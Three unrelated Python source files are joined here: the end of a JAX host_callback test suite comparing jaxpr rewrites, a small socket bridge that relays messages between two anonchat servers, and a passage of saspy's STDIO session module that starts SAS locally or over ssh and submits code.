def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] a d
g = id e
c = mul a b
in (c, f, g) }
num_consts=0
] b e f
d = add a c
in (d, g, h, 0.00) }
length=2
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] a d
g = id e
c = mul a b
in (c, f, g) }
num_consts=0
] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=2
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e i = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] b g
j = id h
f = mul d e
in (*, b, i, j, *, f) }
length=2
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", api.grad(g), [arg])
def test_remat_loop(self):
def f(k, x):
x = hcb.id_print(k + x)
return -k * x
def loss(k):
return lax.fori_loop(0, 1, api.remat(f), k)
self.assertRewrite("""
{ lambda ; a c d.
let _ _ b e f =
while[ body_jaxpr={ lambda ; a b c f g.
let d = add a 1
e h i = remat_call[ call_jaxpr={ lambda ; a b g h.
let c = add a b
d i = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] c g
j = id h
e = neg a
f = mul e d
in (f, i, j) }
concrete=False
name=f ] a c f g
in (d, b, e, h, i) }
body_nconsts=0
cond_jaxpr={ lambda ; a b c e f.
let d = lt a b
in (d,) }
cond_nconsts=0 ] 0 1 a c d
in (b, e, f) }""", loss, [2])
def test_named_call(self):
def tap_scalar(init, do_print=False):
@partial(api.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2, dtype=np.int32))
self.assertRewrite("""
{ lambda a ; b d e.
let c = scan[ jaxpr={ lambda ; a b.
let c = named_call[ call_jaxpr={ lambda ; a b.
let c = add a b
in (c,) }
name=step ] a b
in (c,) }
length=2
linear=(False, False)
num_carry=1
num_consts=0
reverse=False
unroll=1 ] b a
in (c, d, e) }""", tap_scalar, [np.int32(3)])
def test_pmap(self):
def f(xv):
api.pmap(lambda x: jnp.sin(hcb.id_print(x, tap_with_device=True)),
axis_name="i")(xv)
self.assertRewrite("""
{ lambda ; a b c.
let _ d e = xla_pmap[ axis_name=i
axis_size=1
backend=None
call_jaxpr={ lambda ; a e f.
let b g = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print
tap_with_device_=True ] a e
h = id f
c = convert_element_type[ new_dtype=float32 ] b
d = sin c
in (d, g, h) }
devices=None
donated_invars=(False, False, False)
global_arg_shapes=(None,)
global_axis_size=None
in_axes=(0, 0, 0)
name=<lambda>
out_axes=(0, 0, 0) ] a b c
in (d, e) }""", f, [np.array([2])])
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
main.py
|
import argparse, sys, socket, time  # Standard-library imports; time keeps the main thread idle
from threading import Thread
import json
# We use threading because multiprocessing makes passing arguments to targets awkward;
# we also do not need to work around the GIL here.
VERSION = "v0.2"
class Client:
def __init__(self):
self.parser()
self.start()
    def build_msg(self, msg):  # Build a JSON-encoded bridge message
message = {"user": "[BRIDGE]", "msg": msg}
return json.dumps(message, ensure_ascii=False).encode()
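    # For illustration: build_msg("hi") returns the UTF-8 bytes of
    # '{"user": "[BRIDGE]", "msg": "hi"}', the simple JSON wire format this
    # bridge sends to each anonchat server.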
def parser(self):
        parser = argparse.ArgumentParser(
            prog="anonchat-bridge",
            description="Bridge messages between two anonchats",
            epilog="---- Oh, hello there!")  # Create the argument parser
        parser.add_argument("ip", help="IP of the first anonchat-server", type=str)
        parser.add_argument("ip2", help="IP of the second anonchat-server", type=str)  # Declare both positional arguments
args = parser.parse_args() # Parse args
ip = args.ip.split(":") # Split First IP
        ip.append(6969)  # Default port, used if none was supplied
ip2 = args.ip2.split(":") # Second IP
ip2.append(6969)
if ip == ip2:
print(f"Cannot bridge two same servers!")
sys.exit()
        self.ip = ip[0]  # First IP address
try:
self.port = int(ip[1]) # Try to parse port
        except ValueError:
print(f"Cannot parse port {ip[1]} as number. Aborting.")
sys.exit()
self.ip2 = ip2[0] # Second IP
try:
self.port2 = int(ip2[1]) # Second port
        except ValueError:
print(f"Cannot parse port {ip2[1]} as number. Aborting.")
sys.exit()
def start(self):
print(f"[BRIDGE] [GEN] [INF] Bridge version - {VERSION}")
print(f"[BRIDGE] [GEN] [INF] Connecting Socket to IP0 - {self.ip}:{self.port}")
        self.socket_ip1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Create the first socket and connect it to IP0
self.socket_ip1.connect((self.ip, self.port))
print(f"[BRIDGE] [GEN] [INF] Socket bound to IP0")
print(f"[BRIDGE] [GEN] [INF] Connecting Socket to IP1 - {self.ip2}:{self.port2}")
self.socket_ip2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Second IP
self.socket_ip2.connect((self.ip2, self.port2))
print(f"[BRIDGE] [GEN] [INF] Socket bound to IP1")
        self.socket_ip1.send(self.build_msg(f"Bridge from {self.ip2}:{self.port2} connected to this server!"))
        self.socket_ip2.send(self.build_msg(f"Bridge from {self.ip}:{self.port} connected to this server!"))
        message_blacklist = [self.build_msg(f"Bridge from {self.ip}:{self.port} connected to this server!"),
                             self.build_msg(f"Bridge from {self.ip2}:{self.port2} connected to this server!")]
print(f"[BRIDGE] [GEN] [INF] Start up all processes...")
        self.prc_pipe = {"1": None, "2": None, "blacklist": message_blacklist, "kill": False} # Shared state: last forwarded message per server, the blacklist, and a kill flag; without it the bridge would echo messages back and forth
self.request_1 = Thread(target=self.bridge_to, args=(self.socket_ip1, self.socket_ip2, self.prc_pipe, "1"), daemon=True) # Create Thread to send messages from First IP to Second
self.request_1.start()
self.request_2 = Thread(target=self.bridge_to, args=(self.socket_ip2, self.socket_ip1, self.prc_pipe, "2"), daemon=True) # From Second To First
self.request_2.start()
        while True:
            time.sleep(1)  # Keep the main thread alive without spinning; the daemon threads do the bridging
    def bridge_to(self, socket1, socket2, info, num): # socket1: socket to listen on; socket2: socket to forward to; info: shared state dict; num: this server's key ("1" or "2")
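        # The other server's key: "2" when num is "1", and "1" when num is "2".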
target_num = [x for x in info if x != num and x.isdigit()][0]
while True:
if info["kill"]:
return
try:
                message = socket1.recv(1024) # Receive a message from the source server
            except OSError:
                break # Stop this bridge direction on a socket error
            if not message: # An empty read means the peer closed the connection
break
print(f"[BRIDGE] [IP{int(num)-1}] [INF] Got message from IP{int(num)-1}!")
            if info[num] != message and message not in info["blacklist"]: # Forward only if this is not the message we just forwarded and it is not blacklisted
print(f"[BRIDGE] [IP{int(num)-1}] [INF] Sending message to IP{int(target_num)-1}.")
socket2.send(message) # Send encoded message
info.update({"1": message}) # Set up last messages at 1 and at second server
info.update({"2": message})
else:
print(f"[BRIDGE] [IP{int(num)-1}] [INF] Not sending message, because message is already sended or in blacklist.")
if __name__ == "__main__":
    cli = Client() # Run the bridge when executed directly
|
sasiostdio.py
|
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
if os.name != 'nt':
import fcntl
import signal
import subprocess
import tempfile as tf
from time import sleep
import socket as socks
import codecs
import select as sel
import warnings
import io
import logging
logger = logging.getLogger('saspy')
try:
import pandas as pd
import numpy as np
except ImportError:
pass
if os.name == 'nt':
from queue import Queue, Empty
from threading import Thread
class SASconfigSTDIO:
"""
This object is not intended to be used directly. Instantiate a SASsession object instead
"""
def __init__(self, session, **kwargs):
self._kernel = kwargs.get('kernel', None)
SAScfg = session._sb.sascfg.SAScfg
self.name = session._sb.sascfg.name
cfg = getattr(SAScfg, self.name)
self.saspath = cfg.get('saspath', '')
self.options = cfg.get('options', [])
self.ssh = cfg.get('ssh', '')
self.identity = cfg.get('identity', None)
self.luser = cfg.get('luser', None)
self.tunnel = cfg.get('tunnel', None)
self.rtunnel = cfg.get('rtunnel', None)
self.port = cfg.get('port', None)
self.host = cfg.get('host', '')
self.encoding = cfg.get('encoding', '')
self.metapw = cfg.get('metapw', '')
self.lrecl = cfg.get('lrecl', None)
self.iomc = cfg.get('iomc', '')
self.dasho = cfg.get('dasho', None)
localhost = cfg.get('localhost', None)
try:
self.outopts = getattr(SAScfg, "SAS_output_options")
self.output = self.outopts.get('output', 'html5')
except:
self.output = 'html5'
if self.output.lower() not in ['html', 'html5']:
logger.warning("Invalid value specified for SAS_output_options. Using the default of HTML5")
self.output = 'html5'
# GET Config options
try:
self.cfgopts = getattr(SAScfg, "SAS_config_options")
except:
self.cfgopts = {}
lock = self.cfgopts.get('lock_down', True)
# in lock down mode, don't allow runtime overrides of option values from the config file.
self.verbose = self.cfgopts.get('verbose', True)
self.verbose = kwargs.get('verbose', self.verbose)
insaspath = kwargs.get('saspath', '')
if len(insaspath) > 0:
if lock and len(self.saspath):
logger.warning("Parameter 'saspath' passed to SAS_session was ignored due to configuration restriction.")
else:
self.saspath = insaspath
inoptions = kwargs.get('options', '')
if len(inoptions) > 0:
if lock and len(self.options):
logger.warning("Parameter 'options' passed to SAS_session was ignored due to configuration restriction.")
else:
self.options = inoptions
inssh = kwargs.get('ssh', '')
if len(inssh) > 0:
if lock and len(self.ssh):
logger.warning("Parameter 'ssh' passed to SAS_session was ignored due to configuration restriction.")
else:
self.ssh = inssh
inident = kwargs.get('identity', None)
if inident is not None:
if lock:
logger.warning("Parameter 'identity' passed to SAS_session was ignored due to configuration restriction.")
else:
self.identity = inident
inluser = kwargs.get('luser', None)
if inluser is not None:
if lock:
logger.warning("Parameter 'luser' passed to SAS_session was ignored due to configuration restriction.")
else:
self.luser = inluser
intunnel = kwargs.get('tunnel', None)
if intunnel is not None:
if lock:
logger.warning("Parameter 'tunnel' passed to SAS_session was ignored due to configuration restriction.")
else:
self.tunnel = intunnel
inrtunnel = kwargs.get('rtunnel', None)
if inrtunnel is not None:
if lock:
logger.warning("Parameter 'rtunnel' passed to SAS_session was ignored due to configuration restriction.")
else:
self.rtunnel = inrtunnel
ino = kwargs.get('dasho', None)
if ino is not None:
if lock and self.dasho is not None:
logger.warning("Parameter 'dasho' passed to SAS_session was ignored due to configuration restriction.")
else:
self.dasho = ino
inport = kwargs.get('port', None)
if inport is not None:
if lock:
logger.warning("Parameter 'port' passed to SAS_session was ignored due to configuration restriction.")
else:
self.port = inport
inloc = kwargs.get('localhost', None)
if inloc is not None:
if lock and localhost is not None:
logger.warning("Parameter 'localhost' passed to SAS_session was ignored due to configuration restriction.")
else:
localhost = inloc
inhost = kwargs.get('host', '')
if len(inhost) > 0:
if lock and len(self.host):
logger.warning("Parameter 'host' passed to SAS_session was ignored due to configuration restriction.")
else:
self.host = inhost
inencoding = kwargs.get('encoding', 'NoOverride')
if inencoding !='NoOverride':
if lock and len(self.encoding):
logger.warning("Parameter 'encoding' passed to SAS_session was ignored due to configuration restriction.")
else:
self.encoding = inencoding
if not self.encoding:
self.encoding = '' # 'utf-8'
if self.encoding != '':
try:
coinfo = codecs.lookup(self.encoding)
except LookupError:
logger.warning("The encoding provided ("+self.encoding+") doesn't exist in this Python session. Setting it to ''.")
logger.warning("The correct encoding will attempt to be determined based upon the SAS session encoding.")
self.encoding = ''
inlrecl = kwargs.get('lrecl', None)
if inlrecl:
if lock and self.lrecl:
logger.warning("Parameter 'lrecl' passed to SAS_session was ignored due to configuration restriction.")
else:
self.lrecl = inlrecl
if not self.lrecl:
self.lrecl = 1048576
self._prompt = session._sb.sascfg._prompt
if localhost is not None:
self.hostip = localhost
else:
self.hostip = socks.gethostname()
try:
x = subprocess.Popen(('nslookup', self.hostip), stdout=subprocess.PIPE)
z = x.stdout.read()
ip = z.rpartition(b'Address:')[2].strip().decode()
try:
socks.gethostbyaddr(ip)
self.hostip = ip
except:
pass
x.terminate()
except:
pass
return
class SASsessionSTDIO():
"""
The SASsession object is the main object to instantiate and provides access to the rest of the functionality.
cfgname - value in SAS_config_names List of the sascfg_personal.py file
kernel - None - internal use when running the SAS_kernel notebook
saspath - overrides saspath Dict entry of cfgname in sascfg_personal.py file
options - overrides options Dict entry of cfgname in sascfg_personal.py file
   encoding - This is the python encoding value that matches the SAS session encoding of the SAS session you are connecting to
autoexec - This is a string of SAS code that will be submitted upon establishing a connection.
ssh - full path of the ssh command; /usr/bin/ssh for instance
host - host name of the remote machine
identity - path to an .ppk identity file to be used with the ssh -i option
port - (Optional: integer) The ssh port of the remote machine (equivalent to invoking ssh with the -p option)
tunnel - (Optional: integer) Certain methods of saspy require opening a local port and accepting data streamed from the SAS instance.
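   A typical way to get one of these (illustrative sketch; the saspath below is an example only, point it at your own SAS executable):
   sascfg_personal.py:  SAS_config_names = ['default']
                        default = {'saspath': '/opt/sasinside/SASHome/SASFoundation/9.4/bin/sas_u8'}
   then:                import saspy
                        sas = saspy.SASsession(cfgname='default')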
"""
#def __init__(self, cfgname: str ='', kernel: '<SAS_kernel object>' =None, saspath :str ='', options: list =[]) -> '<SASsession object>':
def __init__(self, **kwargs):
self.pid = None
self.stdin = None
self.stderr = None
self.stdout = None
self._sb = kwargs.get('sb', None)
self._log_cnt = 0
self._log = ""
self.sascfg = SASconfigSTDIO(self, **kwargs)
self._startsas()
return
def __del__(self):
if self.pid:
self._endsas()
self._sb.SASpid = None
def _logcnt(self, next=True):
if next == True:
self._log_cnt += 1
return '%08d' % self._log_cnt
def _buildcommand(self, sascfg):
if sascfg.ssh:
pgm = sascfg.ssh
parms = [pgm]
parms += ["-t"]
if sascfg.dasho:
if type(sascfg.dasho) == list:
for s in sascfg.dasho:
parms += ["-o", s]
else:
parms += ["-o", sascfg.dasho]
if sascfg.identity:
parms += ["-i", sascfg.identity]
if sascfg.port:
parms += ["-p", str(sascfg.port)]
if sascfg.tunnel:
parms += ["-R", '%d:localhost:%d' % (sascfg.tunnel,sascfg.tunnel)]
if sascfg.rtunnel:
parms += ["-L", '%d:localhost:%d' % (sascfg.rtunnel,sascfg.rtunnel)]
if sascfg.luser:
parms += [sascfg.luser+'@'+sascfg.host, sascfg.saspath]
else:
parms += [sascfg.host, sascfg.saspath]
if sascfg.output.lower() == 'html':
logger.warning("""HTML4 is only valid in 'local' mode (SAS_output_options in sascfg_personal.py).
Please see SAS_config_names templates 'default' (STDIO) or 'winlocal' (IOM) in the sample sascfg.py.
Will use HTML5 for this SASsession.""")
sascfg.output = 'html5'
else:
pgm = sascfg.saspath
parms = [pgm]
# temporary hack for testing grid w/ sasgsub and iomc ...
if sascfg.iomc:
pgm = sascfg.iomc
parms = [pgm]
parms += ["user", "sas", "pw", "sas"]
parms += ['']
elif sascfg.metapw:
pgm = sascfg.ssh
parms = [pgm]
parms += ["-t", "-i", "/u/sastpw/idrsacnn", sascfg.host]
parms += sascfg.options
#parms += ['"'+sascfg.saspath+' -nodms -stdio -terminal -nosyntaxcheck -pagesize MAX"']
parms += ['']
else:
parms += sascfg.options
parms += ["-nodms"]
parms += ["-stdio"]
parms += ["-terminal"]
parms += ["-nosyntaxcheck"]
parms += ["-pagesize", "MAX"]
parms += ['']
return [pgm, parms]
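   # For illustration only (example values, not taken from any config): with ssh='/usr/bin/ssh', host='remote.linux.host',
   # no extra options, and saspath='/opt/sasinside/SASHome/SASFoundation/9.4/bin/sas_u8', the list built above corresponds
   # roughly to the command line:
   #    /usr/bin/ssh -t remote.linux.host /opt/sasinside/SASHome/SASFoundation/9.4/bin/sas_u8 -nodms -stdio -terminal -nosyntaxcheck -pagesize MAX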
def _startsas(self):
if self.pid:
return self.pid
pgm, parms = self._buildcommand(self.sascfg)
s = ''
for i in range(len(parms)):
s += parms[i]+' '
if os.name == 'nt':
try:
self.pid = subprocess.Popen(parms, bufsize=0, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
pid = self.pid.pid
except OSError as e:
msg = "The OS Error was:\n"+e.strerror+'\n'
msg += "SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n"
msg += "Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n"
msg += "If no OS Error above, try running the following command (where saspy is running) manually to see what is wrong:\n"+s+"\n"
logger.error(msg)
return None
else:
PIPE_READ = 0
PIPE_WRITE = 1
pin = os.pipe()
pout = os.pipe()
perr = os.pipe()
try:
pidpty = os.forkpty()
except:
import pty
pidpty = pty.fork()
if pidpty[0]:
# we are the parent
pid = pidpty[0]
os.close(pin[PIPE_READ])
os.close(pout[PIPE_WRITE])
os.close(perr[PIPE_WRITE])
else:
# we are the child
signal.signal(signal.SIGINT, signal.SIG_DFL)
os.close(0)
os.close(1)
os.close(2)
os.dup2(pin[PIPE_READ], 0)
os.dup2(pout[PIPE_WRITE], 1)
os.dup2(perr[PIPE_WRITE], 2)
os.close(pin[PIPE_READ])
os.close(pin[PIPE_WRITE])
os.close(pout[PIPE_READ])
os.close(pout[PIPE_WRITE])
os.close(perr[PIPE_READ])
os.close(perr[PIPE_WRITE])
try:
#sleep(5)
os.execv(pgm, parms)
except OSError as e:
msg = "The OS Error was:\n"+e.strerror+'\n'
msg += "SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n"
msg += "Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n"
msg += "If no OS Error above, try running the following command (where saspy is running) manually to see what is wrong:\n"+s+"\n"
logger.error(msg)
os._exit(-6)
except:
logger.error("Subprocess failed to start. Double check your settings in sascfg_personal.py file.\n")
os._exit(-6)
if os.name == 'nt':
try:
self.pid.wait(1)
error = self.pid.stderr.read(4096).decode()+'\n'
error += self.pid.stdout.read(4096).decode()
logger.error("Java Error:\n"+error)
msg = "Subprocess failed to start. Double check your settings in sascfg_personal.py file.\n"
msg += "Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n"
msg += "If no Java Error above, try running the following command (where saspy is running) manually to see if it's a problem starting Java:\n"+s+"\n"
logger.error(msg)
self.pid = None
return None
except:
# lame windows can't do non-blocking I/O
self.stdout = Queue()
self.stderr = Queue()
self.to = Thread(target=self._read_out, args=())
self.te = Thread(target=self._read_err, args=())
self.to.daemon = True
self.te.daemon = True
self.to.start()
self.te.start()
self.stdin = self.pid.stdin
else:
self.pid = pidpty[0]
self.stdin = os.fdopen(pin[PIPE_WRITE], mode='wb')
self.stderr = os.fdopen(perr[PIPE_READ], mode='rb')
self.stdout = os.fdopen(pout[PIPE_READ], mode='rb')
fcntl.fcntl(self.stdout, fcntl.F_SETFL, os.O_NONBLOCK)
fcntl.fcntl(self.stderr, fcntl.F_SETFL, os.O_NONBLOCK)
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
lst = self.stdout.read1(4096)
logger.error("stdout from subprocess is:\n"+lst.decode())
if self.pid is None:
msg = "SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n"
msg += "Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n"
msg += "Try running the following command (where saspy is running) manually to see if you can get more information on what went wrong:\n"+s+"\n"
logger.error(msg)
return None
else:
enc = self.sascfg.encoding #validating encoding is done next, so handle it not being set for this one call
if enc == '':
self.sascfg.encoding = 'utf-8'
ll = self.submit("options svgtitle='svgtitle'; options validvarname=any validmemname=extend; ods graphics on;", "text")
self.sascfg.encoding = enc
if self.pid is None:
msg = "SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n"
msg += "Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n"
msg += "Try running the following command (where saspy is running) manually to see if you can get more information on what went wrong:\n"+s+"\n"
logger.error(msg)
return None
if self.sascfg.verbose:
pid = self.pid if os.name != 'nt' else self.pid.pid
logger.info("SAS Connection established. Subprocess id is "+str(pid)+"\n")
return self.pid
if os.name == 'nt':
def _read_out(self):
while True:
lst = self.pid.stdout.read(4096)
if lst == b'':
break
self.stdout.put(lst)
def _read_err(self):
while True:
log = self.pid.stderr.read(4096)
if log == b'':
break
self.stderr.put(log)
def _endsas(self):
rc = 0
ret = None
if self.pid:
code = b";*\';*\";*/;\n;quit;endsas;\n"
self._getlog(wait=1)
if self.pid:
out = self.stdin.write(code)
self.stdin.flush()
#self._asubmit(code,'text')
sleep(1)
if self.pid:
if os.name == 'nt':
pid = self.pid.pid
try:
rc = self.pid.wait(5)
except (subprocess.TimeoutExpired):
if self.sascfg.verbose:
logger.warning("SAS didn't shutdown w/in 5 seconds; killing it to be sure")
self.pid.kill()
self.to.join(5)
self.te.join(5)
else:
pid = self.pid
x = 5
while True:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
break
x = x - 1
if x < 1:
break
sleep(1)
if rc[0] != 0:
pass
else:
if self.sascfg.verbose:
logger.warning("SAS didn't shutdown w/in 5 seconds; killing it to be sure")
os.kill(self.pid, signal.SIGKILL)
if self.sascfg.verbose:
logger.info("SAS Connection terminated. Subprocess id was "+str(pid))
self.pid = None
self._sb.SASpid = None
return ret
def _getlog(self, wait=5, jobid=None):
logf = b''
quit = wait * 2
logn = self._logcnt(False)
code1 = "%put E3969440A681A24088859985"+logn+";\nE3969440A681A24088859985"+logn
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
while True:
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
else:
quit -= 1
if quit < 0 or len(logf) > 0:
break
sleep(0.5)
x = logf.decode(self.sascfg.encoding, errors='replace').replace(code1, " ")
self._log += x
if x.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
if self.pid == None:
self._sb.SASpid = None
return "No SAS process attached. SAS process has terminated unexpectedly."
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
return x
def _getlst(self, wait=5, jobid=None):
lstf = b''
quit = wait * 2
eof = 0
bof = False
lenf = 0
while True:
if os.name == 'nt':
try:
lst = self.stdout.get_nowait()
except Empty:
lst = b''
else:
lst = self.stdout.read1(4096)
if len(lst) > 0:
lstf += lst
if ((not bof) and lst.count(b"<!DOCTYPE html>", 0, 20) > 0):
bof = True
else:
lenf = len(lstf)
if (lenf > 15):
eof = lstf.count(b"</html>", (lenf - 15), lenf)
if (eof > 0):
break
if not bof:
quit -= 1
if quit < 0:
break
sleep(0.5)
if self.pid == None:
self._sb.SASpid = None
return "No SAS process attached. SAS process has terminated unexpectedly."
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
if eof:
return lstf.decode(errors='replace')
else:
return lstf.decode(self.sascfg.encoding, errors='replace')
def _getlsttxt(self, wait=5, jobid=None):
f2 = [None]
lstf = b''
quit = wait * 2
eof = 0
self._asubmit("data _null_;file print;put 'Tom was here';run;", "text")
while True:
if os.name == 'nt':
try:
lst = self.stdout.get_nowait()
except Empty:
lst = b''
else:
lst = self.stdout.read1(4096)
if len(lst) > 0:
lstf += lst
lenf = len(lstf)
eof = lstf.find(b"Tom was here", lenf - 25, lenf)
if (eof != -1):
final = lstf.partition(b"Tom was here")
f2 = final[0].decode(self.sascfg.encoding, errors='replace').rpartition(chr(12))
break
lst = f2[0]
if self.pid == None:
self._sb.SASpid = None
return "No SAS process attached. SAS process has terminated unexpectedly."
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
return lst.replace(chr(12), '\n')
def _asubmit(self, code, results="html"):
      # As this is an _ method, it is not intended for direct use. Note that if it is used and the submitted code
      # writes anything to the LST, then, unless _getlst[txt] is called first, the next submit will pick up the LST
      # this wrote in addition to its own output. If the two are not of the same type (html, text) that could be
      # problematic, beyond simply not being what was expected in the first place. __flushlst__() used to be used for
      # this, but was never needed. Adding this note and removing the unnecessary read in submit, as this can't happen in the current code.
odsopen = b"ods listing close;ods "+self.sascfg.output.encode()+ \
b" (id=saspy_internal) file=stdout options(bitmap_mode='inline') device=svg style="+self._sb.HTML_Style.encode()+ \
b"; ods graphics on / outputfmt=png;\n"
odsclose = b"ods "+self.sascfg.output.encode()+b" (id=saspy_internal) close;ods listing;\n"
ods = True;
if results.upper() != "HTML":
ods = False
if (ods):
self.stdin.write(odsopen)
out = self.stdin.write(code.encode(self.sascfg.encoding)+b'\n')
if (ods):
self.stdin.write(odsclose)
self.stdin.flush()
return str(out)
def submit(self, code: str, results: str ="html", prompt: dict = None, **kwargs) -> dict:
'''
This method is used to submit any SAS code. It returns the Log and Listing as a python dictionary.
code - the SAS statements you want to execute
results - format of results, HTML is default, TEXT is the alternative
prompt - dict of names:flags to prompt for; create macro variables (used in submitted code), then keep or delete
The keys are the names of the macro variables and the boolean flag is to either hide what you type and delete
the macros, or show what you type and keep the macros (they will still be available later)
for example (what you type for pw will not be displayed, user and dsname will):
results = sas.submit(
"""
libname tera teradata server=teracop1 user=&user pw=&pw;
proc print data=tera.&dsname (obs=10); run;
""" ,
prompt = {'user': False, 'pw': True, 'dsname': False}
)
Returns - a Dict containing two keys:values, [LOG, LST]. LOG is text and LST is 'results' (HTML or TEXT)
NOTE: to view HTML results in the ipykernel, issue: from IPython.display import HTML and use HTML() instead of print()
      i.e.: results = sas.submit("data a; x=1; run; proc print; run;")
print(results['LOG'])
HTML(results['LST'])
'''
prompt = prompt if prompt is not None else {}
printto = kwargs.pop('undo', False)
odsopen = b"ods listing close;ods "+self.sascfg.output.encode()+ \
b" (id=saspy_internal) file=stdout options(bitmap_mode='inline') device=svg style="+self._sb.HTML_Style.encode()+ \
b"; ods graphics on / outputfmt=png;\n"
odsclose = b"ods "+self.sascfg.output.encode()+b" (id=saspy_internal) close;ods listing;\n"
ods = True;
mj = b";*\';*\";*/;"
lstf = b''
logf = b''
bail = False
eof = 5
bc = False
done = False
logn = self._logcnt()
#logcodei = "%put E3969440A681A24088859985" + logn + ";"
#logcodeo = b"\nE3969440A681A24088859985" + logn.encode()
logcodei = "%put %upcase(e3969440a681a24088859985" + logn + ");"
logcodeo = b"E3969440A681A24088859985" + logn.encode()
pcodei = ''
pcodeiv = ''
pcodeo = ''
undo = b'proc printto;run;\n' if printto else b''
if self.pid == None:
self._sb.SASpid = None
logger.error("No SAS process attached. SAS process has terminated unexpectedly.")
return dict(LOG="No SAS process attached. SAS process has terminated unexpectedly.", LST='')
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
            return dict(LOG='SAS process has terminated unexpectedly. RC from wait was: '+str(rc), LST='')
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return dict(LOG='SAS process has terminated unexpectedly. Pid State= '+str(rc), LST='')
# to cover the possibility of an _asubmit w/ lst output not read; no known cases now; used to be __flushlst__()
# removing this and adding comment in _asubmit to use _getlst[txt] so this will never be necessary; delete later
#while(len(self.stdout.read1(4096)) > 0):
# continue
if results.upper() != "HTML":
ods = False
if len(prompt):
pcodei += 'options nosource nonotes;\n'
pcodeo += 'options nosource nonotes;\n'
for key in prompt:
gotit = False
while not gotit:
var = self.sascfg._prompt('Please enter value for macro variable '+key+' ', pw=prompt[key])
if var is None:
raise RuntimeError("No value for prompted macro variable provided.")
if len(var) > 0:
gotit = True
else:
print("Sorry, didn't get a value for that variable.")
if prompt[key]:
pcodei += '%let '+key+'='+var+';\n'
pcodeo += '%symdel '+key+';\n'
else:
pcodeiv += '%let '+key+'='+var+';\n'
pcodei += 'options source notes;\n'
pcodeo += 'options source notes;\n'
if ods:
self.stdin.write(odsopen)
pgm = mj+b'\n'+pcodei.encode(self.sascfg.encoding)+pcodeiv.encode(self.sascfg.encoding)
pgm += code.encode(self.sascfg.encoding)+b'\n'+pcodeo.encode(self.sascfg.encoding)+b'\n'+mj
